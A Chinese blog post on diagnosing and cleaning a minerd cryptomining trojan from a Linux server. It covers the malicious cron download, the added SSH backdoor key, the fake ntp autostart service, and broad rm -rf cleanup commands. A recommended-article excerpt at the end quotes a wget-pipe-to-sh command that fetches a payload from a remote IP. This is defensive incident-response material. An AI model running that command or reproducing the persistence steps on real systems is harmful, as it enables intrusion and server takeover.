一次 minerd 肉鸡木马的排查思路

3A网络
• 阅读 481

在日常使用 Linux 系统服务器时,如果系统安全维护方面做的不够规范和严谨,很容易导致主机被黑客植入恶意木马病毒被当做肉鸡。以后就是一次肉鸡木马病毒的排查过程,有助于运维服务器时遇到此情况时进行针对性的排查和修复。

【问题现象】

Linux 主机 CPU 跑满,或者使用服务器越来越慢,以及收到报警信息提示服务器有对外恶意扫描。

【问题原因】

这种状况在出现时通过 top 命令可以看到有一个 minerd 进程占用 CPU 较高。

一次 minerd 肉鸡木马的排查思路

经定位,该进程是一个挖矿程序,通过上述截图可以看到进程对应的 PID 为 1170,根据进程 ID 查询一下产生进程的程序路径

执行 ll /proc/$PID/exe, 其中 $PID 为查询到的进程 ID

异常程序在 /opt 目录下

一次 minerd 肉鸡木马的排查思路

此程序一般是由计划任务产生的,Linux 系统中默认创建了计划任务后会在 /var/spool/cron 目录下创建对应用户的计划任务脚本,执行 ls /var/spool/cron 查询一下系统中是否有异常的计划任务脚本程序。

可以看到,在此目录下有 1 个 root 的计划任务脚本和一个异常的目录 crontabs(默认情况下不会有此目录,用户创建计划任务也不会产生此目录)

一次 minerd 肉鸡木马的排查思路

查看脚本内容,有一个每隔 10 分钟便会通过 curl 下载执行的脚本程序(crontabs 目录下为同样内容的计划任务)

一次 minerd 肉鸡木马的排查思路

手动将脚本内容下载到本地,脚本内容如下:

一次 minerd 肉鸡木马的排查思路

分析此脚本,主要进行了如下修改:

1、创建了上述查看到的两个计划任务脚本

2、创建了密钥认证文件,导入到了 /root/.ssh 目录下(当前脚本的密钥文件名是 KHK75NEOiq,此名称可能会有所变化,要根据具体情况进行核实)

3、修改 ssh 配置文件允许了 root 远程登录,允许了密钥认证,修改默认的密钥认证文件名

4、重启了 sshd 服务使配置生效

5、创建了伪装程序 ntp,并运行了 ntp 程序

6、查询系统中是否有正常运行的计划任务,杀死正在运行的计划任务进程。

【处理方法】

根据以上分析,提供以下处理方法:

1、删除计划任务脚本中异常配置项,如果当前系统之前并未配置过计划任务,可以直接执行 rm -rf /var/spool/cron/* 情况计划脚本目录即可。

2、删除黑客创建的密钥认证文件,如果当前系统之前并未配置过密钥认证,可以直接执行 rm -rf /root/.ssh/* 清空认证存放目录即可。如果有配置过密钥认证,需要删除指定的黑客创建的认证文件即可,当前脚本的密钥文件名是 KHK75NEOiq,此名称可能会有所变化,要根据具体情况进行核实。

3、修复 ssh 配置项,根据个人需求进行修改,一般默认脚本中进行修改的 PermitRootLogin、RSAAuthentication、PubkeyAuthentication 为开启状态,需要修改的是密钥认证文件名,建议修改成默认值 AuthorizedKeysFile .ssh/authorized_keys 即可。修改完成后重启 sshd 服务,使配置生效即可。

4、删除黑客创建的伪装程序 ntp

执行 ls /etc/init.d/ 可以看到系统中是由对应的伪装程序的

一次 minerd 肉鸡木马的排查思路

通过 chkconfig --list ntp 可以看到此程序默认设置的是开机自动启动。

一次 minerd 肉鸡木马的排查思路

如果此程序不进行清除,即使删除了 minerd 程序并且杀死了对应的进程,过一会系统还会重新创建 minerd 程序,并产生新的进程

查询一下当前系统中是否有 ntp 进程,可以看到 ntp 进程是通过 /usr/sbin/ntp 程序产生,因此需要把对应的执行程序也进行删除。

一次 minerd 肉鸡木马的排查思路

总结一下删除伪装程序的操作步骤

kill -9 $PID 杀死查询到的 ntp 进程

rm -rf /etc/init.d/ntp

rm -rf /usr/sbin/ntp (此路径要根据具体的查询数据确定,实际情况可能会有所变化)

5、根据之前的查询 minerd 程序所在路径为 /opt,在执行的脚本中同时也在 /opt 目录下创建了一个 KHK75NEOiq33 的程序文件,因此要删除这两个文件,执行 rm -rf KHK75NEOiq33 minerd 即可。

一次 minerd 肉鸡木马的排查思路

6、使用 kill 命令杀死 minerd 进程

通过 ps 命令查询一下 minerd 对应的进程详细情况。

一次 minerd 肉鸡木马的排查思路

kill -9 $PID 杀死对应的进程 ID

备注:根据 ps 查询结果显示 minerd 有向域名 xmr.crypto-pool.fr 进行数据通信,通过 ping 测试域名解析核实此域名对应的 IP 地址,然后在 ip.taobao.com 进行查询显示 IP 为法国的 IP,然后通过 iftop -i eth1 -PB 命令对流量进行了监控,确实存在向法国的 IP 发送数据的情况,为了避免再次被入侵,可以通过 iptables 屏蔽对应的异常 IP(具体的 IP 和域名要根据实际查询的情况而定,可能会有所不同)。

一次 minerd 肉鸡木马的排查思路

以上修复完成后可以等待一会再次进行一下观察,看看是否还会在 /opt 目录下创建新的 minerd 程序,以及是否还有新的 minerd 进程产生。

最后,建议平时增强服务器的安全维护,优化代码,以避免因程序漏洞等导致服务器被入侵,博主一般都是使用3A的服务器,安全性高,延迟低。

点赞
收藏
评论区
推荐文章
芝士年糕 芝士年糕
2年前
Linux系统启动流程
为什么要了解系统启动流程?主动让软件开机自启电脑不能正常启动,排查出错的环节排查黑客植入木马程序,到底将木马放到了哪里正文linux开机启动流程图1.开机自检(POST,PowerOnSelfTest)电脑通电之后,首先加载B
DevOpSec DevOpSec
3年前
CPU负载过高异常排查实践与总结
昨天下午突然收到运维邮件报警,显示数据平台服务器cpu利用率达到了98.94%,而且最近一段时间一直持续在70%以上,看起来像是硬件资源到瓶颈需要扩容了,但仔细思考就会发现咱们的业务系统并不是一个高并发或者CPU密集型的应用,这个利用率有点太夸张,硬件瓶颈应该不会这么快就到了,一定是哪里的业务代码逻辑有问题。1、排查思路1.1 定位高负载进程首先
从一次CPU打满到ReDos攻击和防范
近期碰到一起值班报警事件,web应用服务器CPU消耗打到99%,排查后发现是因为ReDoS导致了服务器发生了资源被耗尽、访问系统缓慢的问题,通过排查过程从而分享下ReDos攻击的原理、常见场景以及防范和解决方案,如果有错误欢迎指正。
可莉 可莉
3年前
10款常见的Webshell检测工具
当网站服务器被入侵时,我们需要一款Webshell检测工具,来帮助我们发现webshell,进一步排查系统可能存在的安全漏洞。本文推荐了10款Webshll检测工具,用于网站入侵排查。当然,目前市场上的很多主机安全产品也都提供这种WebShell检测能力,比如阿里云、青藤云、safedog等,本文暂不讨论。1、D盾\_Web
Stella981 Stella981
3年前
CODING DevOps 系列第六课:IT 运维之智能化告警实践
IT运维告警现状目前IT运维领域保证服务运行正常的主要方法是对相关运维指标进行实时监控,并根据经验设定一些规则,通过将实时监控的数据与规则进行对比,当某个指标监控值不符合设定的规则时,则判定为异常的状况,这样的话就会发送对应的告警到告警平台。告警平台收到通知后,会分配给对应的运维人员进行处理,运维人员去根据告警信息来排查,最终定
Wesley13 Wesley13
3年前
DDOS肉鸡代码
最近一段时间,所使用的CentOS服务器被不明人士安放了木马程序;观察发现该木马程序是用来发起DDOS攻击的肉鸡程序,在发作时占用绝大部分的网络带宽。起点:wgethttp://65.254.63.20/a|sh;curlOhttp://65.254.63.20/a;sha;rmrfa执行完上面的代码以后,你的机
Stella981 Stella981
3年前
33个常见问题!超全Windows排查手册
无论你是新手还是老手,你的Windows系统都会遇到不容易诊断的问题。而当发生这种情况时,你会怎么做?希望本书可以在系统出现问题但是又不知道到底发生了什么以及问题出现在哪里时,为大家提供解决思路和方法,高效的解决问题。点击免费下载《ECS运维指南之windows系统诊断》(https://www.oschina.net/action/
Stella981 Stella981
3年前
ELK项目es+kibana+jdk配置问题
简介ELK需求背景业务发展越来越庞大,服务器越来越多各种访问日志、应用日志、错误日志量越来越多开发人员排查问题,需要到服务器上查日志,不方便运营人员需要一些数据,需要我们运维到服务器上分析日志说白了就是日志那么多我要给你们搞牛逼的系统如果有机会再搞日志系统加消息列队eskafka消化来的数据ELK包含Elasti
DevOpSec DevOpSec
1年前
lxcfs容器资源视图隔离 for k8s
k8s版本1.25.6,业务k8s容器化,虚机里进程迁移到容器里后,运维在执行freemtop等命令排查问题时一脸迷惑,显示内存还有很多结果pod的容器被oom或CPU资源显示很多核且空闲很多资源进程却运行很慢,我们看到的资源视图是物理机的而非我们做了限定pod里容器的资源,这给研发和运维排查问题带来一定的干扰。
当小白遇到FullGC | 京东云技术团队
本文记录了一次排查FullGC导致的TP99过高过程,介绍了一些排查时思路,线索以及工具的使用,希望能够帮助一些新手在排查问题没有很好的思路时,提供一些思路,让小白也能轻松解决FullGC问题